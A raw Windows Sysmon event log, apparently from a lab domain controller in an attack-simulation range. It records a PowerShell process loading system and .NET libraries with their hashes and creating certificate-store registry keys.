12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 12241200x800000000000000057347907Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347906Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057347905Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057347904Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347903Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347902Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x800000000000000057347900Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347899Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347898Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057347896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA 734700x800000000000000057347895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\3aa672cbe292d5ddf9584d1f7db9d670\Microsoft.Management.Infrastructure.ni.dll10.0.14393.4046csMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.Management.Infrastructure.dllMD5=59875203392777585BF3BEDA3FDE5F58,SHA256=0B34C92AD9369E83E93B027F1C29ACA599E3374355D514B5463DC21A7414C7EEfalse-Unavailable 734700x800000000000000057347894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000057347893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000057347892Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wintrust.dll10.0.14393.4530 (rs1_release.210705-0736)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=992BCD32EF7680C574A426FAA4933ACA,SHA256=5755AC46B4220784A6E6AC12A755CC10892A5AE59B67924576075A1A29D68B3DtrueMicrosoft WindowsValid 734700x800000000000000057347891Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValid 734700x800000000000000057347890Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057347889Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057347888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057347887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 734700x800000000000000057347886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057347885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 10341000x800000000000000057347884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057347883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 734700x800000000000000057347882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.960{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll10.0.14393.4583System.Management.AutomationMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationSystem.Management.Automation.dllMD5=AD8389BA939281CED11F6F269CA54BF8,SHA256=6091BCDB4AE15E026EE5E4C39D32553DE70C502F8735EC5144FBC88990BA2FACfalse-Unavailable 734700x800000000000000057347881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057347880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057347879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057347878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057347877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\eda6c4a8c148f7e83fb160d7019294f2\Microsoft.PowerShell.ConsoleHost.ni.dll10.0.14393.3866Microsoft.PowerShell.ConsoleHostMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.ConsoleHost.dllMD5=BFE1CC91C2632CC5FAD1ED362D20C613,SHA256=14A306207F0270D0B0CF96794C97ECACCD2E9CA46CCDE64EA031A1F0CA3A0E9Afalse-Unavailable 734700x800000000000000057347876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057347875Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057347874Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057347873Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057347872Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057347871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057347870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.944{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d7d7bf-0x700e84f7) 12241200x800000000000000057347869Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.944{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll 734700x800000000000000057347868Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057347867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057347866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.944{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057347865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.943{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057347864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.942{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057347863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.940{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057347862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.939{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057347861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.938{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057347860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.938{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057347859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057347858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057347857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057347856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057347855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® 